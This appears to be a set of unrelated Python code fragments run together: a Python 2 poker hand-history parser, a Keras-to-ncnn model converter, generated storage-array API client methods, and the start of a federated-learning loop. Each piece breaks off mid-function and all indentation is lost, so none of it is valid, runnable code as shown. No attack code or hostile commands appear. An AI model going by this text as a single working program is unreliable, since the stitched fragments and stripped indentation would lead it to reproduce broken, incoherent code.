#gc.set_debug(gc.DEBUG_LEAK)
#return infoset_list
#makefile(infoset_list)
def grab_header(file_contents,i,infoset):
#First get stakes and game type
start = file_contents[i].index('$')
end = file_contents[i].index(')')
sliver = file_contents[i][start:end]
game_stakes = copy.copy(sliver)
#get bb
bb_slice = re.search(r"\/\$(\d+)",game_stakes)
bb = int(copy.copy(bb_slice.group(1)))
#print game_stakes, bb
start = file_contents[i].index(':')+2
end = file_contents[i].index('(')
sliver = file_contents[i][start:end]
game_type = copy.copy(sliver)
#print game_type
i += 1
#get ring type
start = file_contents[i].index('-') - 1
end = file_contents[i].index('S')
sliver = file_contents[i][start:end]
ring_type = copy.copy(sliver)
#print ring_type
header = game_stakes + ' ' + game_type + ring_type
print 'header',header
infoset.header = header
i += 1
return (header, bb, i)
def grab_positions_stacks(file_contents,i,bb,positions,players,infoset,skip):
while re.search(r"Seat (\d)",file_contents[i]):
#print "line",file_contents[i]
values = re.search(r"Seat (\d): (.*)\s\(\$([\d,\.,\,]+)",file_contents[i])
#print values.group(2)
position = values.group(2)
#get rid of commas in large numbers
stacksize_slice = copy.copy(values.group(3))
stacksize_slice = stacksize_slice.replace(',','')
stacksize_bb = (float(stacksize_slice)) / bb
players.append(cl.Player_load(stacksize_bb,position))
positions.append([position] + [stacksize_bb])
i += 1
print 'positions',positions
infoset.positions_stacks = positions
if len(positions) > 2:
#i += 1
skip = True
return (positions,i,players,skip)
#TODO: make this whole system more resilient to more players etc.
#TODO find hero and opponent and replace with generic positions
#create dictionary with names and actual positions
def grab_pot_blinds(file_contents,i,bb,pot,players):
#print '1', file_contents[i]
#HU only
people = []
while not re.search(r"blind",file_contents[i]):
i += 1
last_bet = 0
blinds = 0
blinds = re.search(r"\$(\d+)",file_contents[i])
blind = float(int(blinds.group(1)))/bb
#print 'SB', blind
player_small = re.search(r"(.*):",file_contents[i])
people.append(player_small.group(1))
#print player_small.group(1)
#add blinds to bet total for that player
for d in xrange(0,len(players)):
if players[d].position == player_small.group(1):
players[d].street_bet_total = blind
players[d].bet_total = blind
#This is for multi-player
#for d in xrange(0,len(players)):
# if players[d].position == "Small Blind":
# players[d].street_bet_total = blind
# players[d].bet_total = blind
# print "triggered"
#print "SB",blind
pot += blind
i +=1
while not re.search(r"blind",file_contents[i]):
i += 1
blinds = re.search(r"\$(\d+)",file_contents[i])
blind = float(int(blinds.group(1)))/bb
#print 'BB',blind
player_big = re.search(r"(.*):",file_contents[i])
people.append(player_big.group(1))
#print player_big.group(1)
for d in xrange(0,len(players)):
print players[d].position == player_big.group(1)
if players[d].position == player_big.group(1):
players[d].street_bet_total = blind
players[d].bet_total = blind
last_bet = blind
#this is for multiplayer
#for d in xrange(0,len(players)):
# if players[d].position == "Big Blind":
# players[d].street_bet_total = blind
# players[d].bet_total = blind
# last_bet = blind
# print "last",last_bet
pot += blind
while not re.search(r"^\*",file_contents[i]):
i += 1
#print 'i', i
#print "pot",pot
#print file_contents[i], i
true_position = ['small blind','big blind']
position_replace = dict(zip(people,true_position))
print position_replace
i += 1
return (pot,i,players,last_bet,position_replace)
def grab_hand(file_contents,i,infoset,players):
#add hero's hand. Order hero hand and convert into ints
holes = re.search(r"\[(.+)\]",file_contents[i])
#if no hero, skip hand.
if not holes:
print 'omg no holes'
hero_holes = holes.group(1)
newcards = hand_conversion(hero_holes)
simplified_hand = dg.simplify(newcards)
simplified_hand.sort(reverse = True)
#print '1',simplified_hand,newcards
suits = map(lambda x:x[1],newcards)
generic_suits = map(lambda x:x[1],simplified_hand)
#print '2',suits,generic_suits
newsuits = unique(suits)
newgeneric_suits = unique(generic_suits)
#print '3',newsuits,newgeneric_suits
suit_replace = dict(zip(newsuits,newgeneric_suits))
hero_cards = hand_reconversion(newcards)
generic_hand = hand_reconversion(simplified_hand)
infoset.hand_sorted = hero_cards
infoset.hand_generic = generic_hand
print 'gen hand',infoset.hand_generic
#print 'suit_replace',suit_replace
return (i,players,suit_replace)
def hand_conversion(cards):
cards = ''.join(cards.split())
#print 'cards',cards
hero = list(cards)
#print 'hero',hero
newcards = [hero[y:y+2] for y in range(0,len(hero),2)]
for x in xrange(0,len(newcards)):
newcards[x][0] = cl.handvalues.get(newcards[x][0])
newcards.sort(reverse = True)
#print "newhero",newcards
return newcards
def hand_reconversion(cards):
#turn 2d list into 1d string
single = list(itertools.chain.from_iterable(cards))
#turn 1d list into concatenated str
hero_cards = ''.join(str(e) for e in single)
return hero_cards
def unique(seq, idfun=None):
# order preserving
if idfun is None:
def idfun(x): return x
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen: continue
seen[marker] = 1
result.append(item)
return result
def grab_actions(file_contents,i,infoset,bb,pot,players,suit_replace,last_bet,eff_stack,position_replace):
print "grab_actions"
first_street = True
street = 0
infoset.board = []
infoset.generic_board = []
infoset.actions_full = []
#Get all actions and board cards until end of hand
while not re.search(r"(SHOW DOWN)",file_contents[i]) and not re.search("Uncalled",file_contents[i])\
and not re.search(r"(collected)",file_contents[i]):
#resets bettotal for subsequent streets
if first_street == False:
for p in xrange(0,len(players)):
players[p].street_bet_total = 0
line = copy.copy(file_contents[i])
print "start" ,i,file_contents[i]
place = re.search(r"\* ([A-Z]+) \*",file_contents[i])
if place:
print "Street",place.group(1)
grab_cards = re.findall(r"(\[[a-zA-Z,\s,\d]+\])",file_contents[i])
segment = grab_cards[-1]
board = segment.replace("]","")
#print "board",board
newboard = board.replace("[","")
#print "board",newboard
#have to order and break up the flop, update suit_replace
board = hand_conversion(newboard)
print "newboard", board
(generic_board,suit_replace) = dg.board_simplify(board,suit_replace)
infoset.board.append(grab_cards[-1])
infoset.generic_board.append(generic_board)
infoset.actions_full.append(generic_board)
print generic_board, board
i+=1
#grab actions and positions
while not re.search(r"^\*",file_contents[i]) and not re.search("Uncalled",file_contents[i]):
#while re.search("|".join(["raises"]))
#print "pos1",file_contents[i]
#print 'pot', pot
#check for "Table deposit $xxx" and "Seat re-join" and skip
while re.search(r"Table",file_contents[i]) or re.search(r"Seat re-join",file_contents[i])\
or re.search(r"Seat sit down",file_contents[i]) or re.search(r"doesn't show hand",file_contents[i]):
print "skip"
print i,file_contents[i]
i += 1
if re.search(r"^\*",file_contents[i]) or re.search("Uncalled",file_contents[i])\
or re.search(r"(collected)",file_contents[i]):
break
#print 'uncalled boolean',not re.search("Uncalled",file_contents[i])
print file_contents[i]
values = re.search(r"(.+): (.+)",file_contents[i])
#print "values",values.group(1),"\n",values.group(2)
position = copy.copy(values.group(1))
temp = copy.copy(values.group(2))
action = temp[:-1]
pure_action = re.search(r"([a-z]+)",action)
print pure_action.group(0)
#print "if than bets", pure_action.group(0) == "bets"
#print "if than calls", pure_action.group(0) == "calls"
firstword = re.search(r"\s\$([\d]+|[,.][\d]+)?",action)
#print "firstattempt", firstattempt.group(1)
#nextword = firstattempt = firstattempt.replace(',','')
#firstword = float(firstattempt)
if firstword:
#print 'firstword', firstword.group(1)
for p in xrange(0,len(players)):
if players[p].position == position:
current_player = players[p]
allin = re.search(r"s\s(all-in)",action)
if allin:
#print 'allin',allin.group(1)
current_player.allin = True
print 'current_player.bet_total', current_player.bet_total
if pure_action.group(0) == "bets":
#print "ding bets"
true_amnt_slice = re.search(r"s\s\$(\d+[,]?\d+[\.]?[\d+]?)",action)
combined = re.sub(r",","",true_amnt_slice.group(1))
amnt = float(combined)/bb
#HU only, removes the possibility of betting more than eff stack
if (amnt + current_player.bet_total) > eff_stack:
"effective_bet"
amnt = (eff_stack - current_player.bet_total)
current_player.bet_total += amnt
current_player.street_bet_total += amnt
last_bet = copy.copy(current_player.street_bet_total)
#print 'pot,addition',pot,amnt
ratio = float(amnt)/pot
pot += amnt
elif pure_action.group(0) == "calls":
#print "ding call"
true_amnt_slice = re.search(r"s\s\$(\d+[,]?[\d+]?[\.]?[\d+]?)",action)
end_value = re.sub(r",","",true_amnt_slice.group(1))
#print "true",end_value
amnt = float(end_value)/bb
current_player.bet_total += amnt
current_player.street_bet_total += amnt
#TODO: in ring games, need to account for limps pre
#last_bet = copy.copy(current_player.street_bet_total)
#print "pot,addition",pot,amnt
pot += amnt
ratio = float(amnt)/pot
if current_player.allin == True:
#HU only
#print "allin trigger"
#print players[0].bet_total
for q in xrange(0,len(players)):
if players[q].position != current_player.position:
villain_player = players[q]
print villain_player
if current_player.bet_total != villain_player.bet_total:
extra = villain_player.bet_total - current_player.bet_total
#print 'extra', extra
#print villain_player.bet_total, current_player.bet_total
pot -= extra
villain_player.bet_total -= extra
elif pure_action.group(0) == "raises":
#print "ding raise"
#fix to scrap the cents after period
true_amnt_slice = re.search(r"o\s\$(\d+[,]?\d+[\.]?[\d+]?)",action)
end_value = re.sub(r",","",true_amnt_slice.group(1))
#print "true",end_value
amnt = float(end_value)/bb
#if true_amnt_slice.group(2):
# print "true2"
total_raise = float(end_value)/bb
#minus what i have invested
true_amnt = total_raise - current_player.street_bet_total
#check if allin
#print 'sub',(last_bet - current_player.street_bet_total)
#print "last", last_bet
#print 'pot', pot
maxraise = (last_bet) + (last_bet - current_player.street_bet_total) + pot
#print 'ratio 2nd',maxraise,amnt
#HU only - raise up to eff_stacksize
if (true_amnt + current_player.bet_total) > eff_stack:
| |
<filename>converter/converter.py
# https://github.com/Tencent/ncnn/wiki/how-to-implement-custom-layer-step-by-step
# https://github.com/Tencent/ncnn/wiki/param-and-model-file-structure
# https://github.com/Tencent/ncnn/wiki/operation-param-weight-table
import numpy as np
from tqdm import tqdm
from functools import partial
from collections import OrderedDict
from converter.model_adaptation import get_outbound_nodes, convert_blob, clean_node_name
activation_type_dict = {'linear': 0, 'relu': 1, 'sigmoid': 4, 'tanh': 5}
layer_type_mapping = {'OutputSplit': 'Split', 'InputLayer': 'Input', 'ReLU': 'ReLU', 'LeakyReLU': 'ReLU',
'MaxPooling2D': 'Pooling', 'AveragePooling2D': 'Pooling',
'MaxPool2D': 'Pooling', 'AvgPool2D': 'Pooling',
'GlobalMaxPooling2D': 'Pooling', 'GlobalAveragePooling2D': 'Pooling',
'GlobalMaxPool2D': 'Pooling', 'GlobalAvgPool2D': 'Pooling',
'Conv2D': 'Convolution', 'Concatenate': 'Concat',
'UpSampling2D': 'Interp', 'Add': 'Eltwise', 'Multiply': 'Eltwise',
'DepthwiseConv2D': 'ConvolutionDepthWise', 'BatchNormalization': 'BatchNorm',
'Conv2DTranspose': 'Deconvolution', 'ZeroPadding2D': 'Padding', 'ReflectPadding2D': 'Padding',
'Reshape': 'Reshape',
'Clip': 'Clip', 'InstanceNormalization': 'InstanceNorm',
'Softmax': 'Softmax', 'Swish': 'Swish',
'sigmoid': 'Sigmoid', 'softmax': 'Softmax', 'relu': 'ReLU', 'tanh': 'TanH', 'Flatten': 'Reshape',
'Dense': 'InnerProduct',
'Sqrt': 'UnaryOp',
'Subtract': 'BinaryOp', 'Div': 'BinaryOp', 'Interp': 'Interp',
'MultiplyBroadCasted': 'BinaryOp'}
def fix_axis_value(in_dict, axis):
if axis < 0:
axis = len(in_dict['layer'].output_shape) + axis
if len(in_dict['layer'].output_shape) == 4:
magic_number = 2
elif len(in_dict['layer'].output_shape) == 3:
magic_number = 1
else:
raise NotImplemented
# Need this NCNN has 3-dim tensors
if 'NCHW':
axis = magic_number - int(axis - 1)
else:
assert False, 'NHWC is not supported'
assert axis >= 0, 'Axis can not be negative'
return axis
def get_valid_shape(raw_shape):
if isinstance(raw_shape, list):
layer_shape_list = raw_shape
else:
layer_shape_list = [raw_shape]
return layer_shape_list
def get_layer_type(layer):
type_mapping = type(layer).__name__
if type_mapping == 'Activation':
type_mapping = layer.get_config()['activation']
elif type_mapping == 'BatchNormalization':
try:
call_args = layer.inbound_nodes[0].call_kwargs
if 'training' in call_args:
if call_args['training'] in [1, True]:
type_mapping = 'InstanceNormalization'
except Exception as e_item:
print('Implicit Instance Normalization')
print(str(e_item))
elif type_mapping == 'Multiply':
_first = layer.input_shape[0]
check = all([len(i) == len(_first) for i in layer.input_shape[1:]])
if check:
check = all([all([j == k for j, k in zip(i, _first)]) for i in layer.input_shape[1:]])
if not check:
type_mapping = 'MultiplyBroadCasted'
assert len(layer.input_shape) == 2, "Only BinaryOp supported"
mapping_function_name = '_'.join(['get', str(type_mapping).lower(), 'mapping'])
return layer_type_mapping[type_mapping], mapping_function_name
def get_layer_name(layer):
return layer.get_config()['name']
def get_blob_shape_string(layer, batch_size):
N = batch_size
item_counter = 0
item_list = []
layer_output_shape = get_valid_shape(layer.output_shape)
for output_shape in layer_output_shape:
item_counter += 4
item_list.extend((N,) + output_shape[1:])
blob_shape_string = ','.join([str(item) for item in [item_counter] + item_list])
return blob_shape_string
def get_split_shape_string(layer_output_shape, batch_size):
N = batch_size
item_counter = 0
item_list = []
for output_shape in layer_output_shape:
_, H, W, C = output_shape
item_counter += 4
item_list.extend([N, H, W, C])
blob_shape_string = ','.join([str(item) for item in [item_counter] + item_list])
return blob_shape_string
def split_remap(blob_name, split_info):
if blob_name in split_info:
out_blob_name = split_info[blob_name]
else:
out_blob_name = blob_name
return out_blob_name
def get_in_out_string(in_dict):
layer = in_dict['layer']
input_blobs = []
output_blobs = []
layer_input = convert_blob(layer.input)
if layer.__class__.__name__ == 'InputLayer':
layer_input = []
layer_output = convert_blob(layer.output)
for item in layer_input:
input_blobs.append(clean_node_name(item.name))
for item in layer_output:
output_blobs.append(clean_node_name(item.name))
in_out_list = [str(len(input_blobs)), str(len(output_blobs)), ' '.join(input_blobs), ' '.join(output_blobs)]
in_out_string = ' '.join(in_out_list)
split_string = None
return in_out_string, split_string, (input_blobs + output_blobs)
def get_outputsplit_mapping(in_dict):
parameter_mapping = OrderedDict({})
return parameter_mapping
def get_reshape_mapping(in_dict):
# Reshape 0 w -233
# 1 h -233
# 2 c -233
# 3 permute 0
layer_config = in_dict['layer'].get_config()
target_shape = layer_config['target_shape']
if len(target_shape) == 3:
y_size, x_size, c_size = target_shape
parameter_mapping = OrderedDict({0: x_size, 1: y_size, 2: c_size, 3: 0})
elif len(target_shape) == 2:
xy_size, c_size = target_shape
parameter_mapping = OrderedDict({0: xy_size, 1: c_size, 2: -233, 3: 1})
elif len(target_shape) == 1:
c_size, = target_shape
parameter_mapping = OrderedDict({0: c_size, 1: -233, 2: -233, 3: 1})
else:
raise NotImplemented
return parameter_mapping
def get_flatten_mapping(in_dict):
# Reshape 0 w -233
# 1 h -233
# 2 c -233
# 3 permute 0
parameter_mapping = OrderedDict({0: -1, 3: 1})
return parameter_mapping
def get_unaryop_mapping(in_dict, optype):
# enum OperationType
# {
# Operation_ABS = 0,
# Operation_NEG = 1,
# Operation_FLOOR = 2,
# Operation_CEIL = 3,
# Operation_SQUARE = 4,
# Operation_SQRT = 5,
# Operation_RSQRT = 6,
# Operation_EXP = 7,
# Operation_LOG = 8,
# Operation_SIN = 9,
# Operation_COS = 10,
# Operation_TAN = 11,
# Operation_ASIN = 12,
# Operation_ACOS = 13,
# Operation_ATAN = 14,
# Operation_RECIPROCAL = 15,
# Operation_TANH = 16
# };
parameter_mapping = OrderedDict({0: optype})
return parameter_mapping
get_sqrt_mapping = partial(get_unaryop_mapping, optype=5)
def get_binaryop_mapping(in_dict, optype):
# enum OperationType
# {
# Operation_ADD = 0,
# Operation_SUB = 1,
# Operation_MUL = 2,
# Operation_DIV = 3,
# Operation_MAX = 4,
# Operation_MIN = 5,
# Operation_POW = 6,
# Operation_RSUB = 7,
# Operation_RDIV = 8
# };
parameter_mapping = OrderedDict({0: optype})
return parameter_mapping
get_subtract_mapping = partial(get_binaryop_mapping, optype=1)
get_multiplybroadcasted_mapping = partial(get_binaryop_mapping, optype=2)
get_div_mapping = partial(get_binaryop_mapping, optype=3)
def get_inputlayer_mapping(in_dict):
# Input 0 w 0
# 1 h 0
# 2 c 0
layer_config = in_dict['layer'].get_config()
N, H, W, C = layer_config['batch_input_shape']
parameter_mapping = OrderedDict()
if W is not None:
parameter_mapping[0] = W
if H is not None:
parameter_mapping[1] = H
if C is not None:
parameter_mapping[2] = C
return parameter_mapping
def get_padding_mapping(in_dict, pad_type=0):
# Padding
# 0 top 0
# 1 bottom 0
# 2 left 0
# 3 right 0
# 4 type 0
# 5 value 0.f
# 6 per_channel_pad_data_size 0
# 7 front 0
# 8 behind 0
# int type; -> pad_type // 0=CONSTANT 1=REPLICATE 2=REFLECT
layer_config = in_dict['layer'].get_config()
per_channel_pad_data_size = 0
front = behind = 0
pad_value = float("{0:.7f}".format(0.))
top_pad, bottom_pad, left_pad, right_pad = np.array(layer_config['padding']).flatten()
parameter_mapping = OrderedDict({0: top_pad, 1: bottom_pad, 2: left_pad, 3: right_pad,
4: pad_type, 5: pad_value, 6: per_channel_pad_data_size,
7: front, 8: behind})
return parameter_mapping
get_zeropadding2d_mapping = partial(get_padding_mapping, pad_type=0)
get_reflectpadding2d_mapping = partial(get_padding_mapping, pad_type=2)
def get_pooling2d_mapping(in_dict, pooling_type, global_pooling=0):
# Pooling :: from C++ enum PoolMethod { PoolMethod_MAX = 0, PoolMethod_AVE = 1 };
# 0 pooling_type 0
# 1 kernel_w 0
# 11 kernel_h kernel_w
# 2 stride_w 1
# 12 stride_h stride_w
# 3 pad_left 0
# 14 pad_right pad_left
# 13 pad_top pad_left
# 15 pad_bottom pad_top
# 4 global_pooling 0
# 5 pad_mode 0
layer_config = in_dict['layer'].get_config()
if global_pooling == 0:
kernel_h, kernel_w = layer_config['pool_size']
stride_h, stride_w = layer_config['strides']
layer = in_dict['layer']
layer_input_shape = get_valid_shape(layer.input_shape)
layer_output_shape = get_valid_shape(layer.output_shape)
input_y_size, input_x_size = layer_input_shape[0][1:3]
output_y_size, output_x_size = layer_output_shape[0][1:3]
if kernel_h == stride_h:
pad_bottom = pad_top = 0
else:
pad_top, pad_bottom = get_pooling_padding(input_y_size, output_y_size, kernel_h, stride_h, None)
if kernel_w == stride_w:
pad_left = pad_right = 0
else:
pad_left, pad_right = get_pooling_padding(input_x_size, output_x_size, kernel_w, stride_w, None)
pad_mode = 0
parameter_mapping = OrderedDict({0: pooling_type, 1: kernel_w, 2: stride_w, 3: pad_left,
4: global_pooling, 5: pad_mode,
11: kernel_h, 12: stride_h, 13: pad_top, 14: pad_right, 15: pad_bottom})
else:
parameter_mapping = OrderedDict({0: pooling_type, 4: global_pooling})
return parameter_mapping
get_maxpooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=0, global_pooling=0)
get_averagepooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=1, global_pooling=0)
get_globalmaxpooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=0, global_pooling=1)
get_globalaveragepooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=1, global_pooling=1)
def get_multiply_mapping(in_dict):
return get_merge_mapping(in_dict, op_type=0)
def get_add_mapping(in_dict):
return get_merge_mapping(in_dict, op_type=1)
def get_merge_mapping(in_dict, op_type):
# Add, Multiply, Max -> C++ class Eltwise : public Layer
# enum OperationType { Operation_PROD = 0, Operation_SUM = 1, Operation_MAX = 2 };
# Eltwise
# 0 op_type 0
# 1 coeffs []
# TODO :: support other ops
parameter_mapping = OrderedDict({0: op_type})
return parameter_mapping
def get_upsampling2d_mapping(in_dict):
# Interp
# 0 resize_type 0 #FIXED TO 1 (nearest), 2 (bilinear)
# 1 height_scale 1.f
# 2 width_scale 1.f
# 3 output_height 0
# 4 output_width 0
layer_config = in_dict['layer'].get_config()
resize_type = 1
# print(layer_config)
if 'interpolation' in layer_config:
if layer_config['interpolation'] == 'bilinear':
resize_type = 2
height_scale, width_scale = layer_config['size']
parameter_mapping = OrderedDict({0: resize_type, 1: float("{0:.7f}".format(height_scale)),
2: float("{0:.7f}".format(width_scale)),
# TODO :: Clarify lines below
# 3: <>, 4: <>
})
return parameter_mapping
def get_interp_mapping(in_dict, use_scale=False):
# Interp
# 0 resize_type 0 #FIXED TO 1 (nearest), 2 (bilinear)
# 1 height_scale 1.f
# 2 width_scale 1.f
# 3 output_height 0
# 4 output_width 0
layer = in_dict['layer']
layer_config = layer.get_config()
# TODO Bilinear interpolation is not working properly!
# resize_type = 2 #'bilinear'
resize_type = 1
if use_scale:
# This one is not preferable due to the rounding errors
layer_input_shape = get_valid_shape(layer.input_shape)
# layer_output_shape = get_valid_shape(layer.output_shape)
input_y_size, input_x_size = layer_input_shape[0][1:3]
# output_y_size, output_x_size = layer_output_shape[0][1:3]
new_height, new_width = list(layer_config['new_size'])
height_scale = new_height/input_y_size
width_scale = new_width/input_x_size
parameter_mapping = OrderedDict({0: resize_type, 1: float("{0:.7f}".format(height_scale)),
2: float("{0:.7f}".format(width_scale)),
# TODO :: Looks like not working properly
# 3: <>, 4: <>
})
else:
new_height, new_width = list(layer_config['new_size'])
parameter_mapping = OrderedDict({0: resize_type, 3: str(int(new_height)),
4: str(int(new_width)),
})
return parameter_mapping
def get_conv_padding(input_size, output_size, kernel_size, stride_size, dilation_rate):
effective_kernel = kernel_size + 2*(dilation_rate - 1)
# t_pad = effective_kernel + stride_size * (output_size - 1) - input_size
t_pad = stride_size * output_size - input_size + effective_kernel - stride_size
t_pad = max(t_pad, 0)
f_pad = s_pad = 0
if t_pad > 0:
f_pad = t_pad // 2
s_pad = t_pad - f_pad
return f_pad, s_pad
def get_pooling_padding(input_size, output_size, kernel_size, stride_size, dilation_rate):
t_pad = stride_size * output_size - input_size + kernel_size - stride_size
t_pad = max(t_pad, 0)
f_pad = s_pad = 0
if t_pad > | |
on data type,
`start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`,
`7200000`, and `86400000` are possible values.
start_time (int, optional):
When the time window starts (in milliseconds since epoch).
type (str, optional):
Display the metric of a specified object type. Valid values are `all`, `file-
system`, and `object-store`. If not specified, defaults to `all`.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
end_time=end_time,
resolution=resolution,
start_time=start_time,
type=type,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_performance_replication_get_with_http_info
return self._call_api(endpoint, kwargs)
def get_arrays_s3_specific_performance(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayS3SpecificPerformanceGetResp
"""
List the S3 performance metrics of the array.
Args:
end_time (int, optional):
When the time window ends (in milliseconds since epoch).
resolution (int, optional):
The desired ms between samples. Available resolutions may depend on data type,
`start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`,
`7200000`, and `86400000` are possible values.
start_time (int, optional):
When the time window starts (in milliseconds since epoch).
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
end_time=end_time,
resolution=resolution,
start_time=start_time,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_s3_specific_performance_get_with_http_info
return self._call_api(endpoint, kwargs)
def get_arrays_space(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
type=None, # type: str
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArraySpaceGetResponse
"""
List available and used storage space on the array.
Args:
end_time (int, optional):
When the time window ends (in milliseconds since epoch).
resolution (int, optional):
The desired ms between samples. Available resolutions may depend on data type,
`start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`,
`7200000`, and `86400000` are possible values.
start_time (int, optional):
When the time window starts (in milliseconds since epoch).
type (str, optional):
Display the metric of a specified object type. Valid values are `array`, `file-
system`, and `object-store`. If not specified, defaults to `array`.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
end_time=end_time,
resolution=resolution,
start_time=start_time,
type=type,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_space_get_with_http_info
return self._call_api(endpoint, kwargs)
def get_arrays_supported_time_zones(
self,
references=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArraysSupportedTimeZonesGetResponse
"""
List supported time zones for the array.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides names keyword arguments.
continuation_token (str, optional):
An opaque token to iterate over a collection of resources.
filter (Filter, optional):
A filter to include only resources that match the specified criteria.
limit (int, optional):
Limit the number of resources in the response. If not specified, defaults to
1000.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
offset (int, optional):
The offset of the first resource to return from a collection.
sort (list[Property], optional):
Sort the response by the specified Properties. Can also be a single element.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
filter=filter,
limit=limit,
names=names,
offset=offset,
sort=sort,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_supported_time_zones_get_with_http_info
_process_references(references, ['names'], kwargs)
return self._call_api(endpoint, kwargs)
def get_audits(
self,
references=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
filter=None, # type: str
ids=None, # type: List[str]
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.AuditGetResponse
"""
List the array audit trail to view activities that were performed on the array.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids and names keyword arguments.
continuation_token (str, optional):
An opaque token to iterate over a collection of resources.
filter (Filter, optional):
A filter to include only resources that match the specified criteria.
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
limit (int, optional):
Limit the number of resources in the response. If not specified, defaults to
1000.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
offset (int, optional):
The offset of the first resource to return from a collection.
sort (list[Property], optional):
Sort the response by the specified Properties. Can also be a single element.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
filter=filter,
ids=ids,
limit=limit,
names=names,
offset=offset,
sort=sort,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._audits_api.api20_audits_get_with_http_info
_process_references(references, ['ids', 'names'], kwargs)
return self._call_api(endpoint, kwargs)
def get_blades(
self,
references=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
filter=None, # type: str
ids=None, # type: List[str]
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
total_only=None, # type: | |
arguments:
stepsize -- stepsize of local model
k -- number of inner steps of local model
"""
if not (model == 'expmix' or model == 'local'):
raise NameError('Unknown model {}. Available models are \'expmix\' and \'local\'.'.format(model))
loss_array = []
loss_weights = []
for worker_counter, worker in self.workers.items():
client_id = counter_to_id[worker_counter]
start_time = time.time()
x, y = load_data_npy(prefix=prefix, node_id=client_id, postfix_X=postfix_X, postfix_y=postfix_y)
assert y.shape[1] == self.d_y
assert x.shape[0] == y.shape[0]
